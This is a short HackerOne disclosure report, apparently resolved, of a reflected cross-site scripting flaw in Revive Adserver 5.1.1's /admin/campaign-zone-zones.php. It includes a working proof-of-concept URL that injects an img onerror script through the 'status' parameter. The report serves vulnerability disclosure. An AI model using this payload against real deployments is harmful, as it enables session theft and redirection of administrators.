Reflected XSS on /admin/campaign-zone-zones.php
Medium
Vulnerability Details
I found a reflected XSS attack on `/admin/campaign-zone-zones.php`.
Revive-Adserver version is `revive-adserver-5.1.1`.
- Go to `http://revive-adserver.loc/admin/campaign-zone-zones.php?_=&clientid=1&campaignid=1&status=available%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E&text=`
- Malicious code executed
{F1187355}
Rendered response from server:
{F1187356}
## Impact
With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.
Actions
View on HackerOneReport Stats
- Report ID: 1097979
- State: Closed
- Substate: resolved
- Upvotes: 7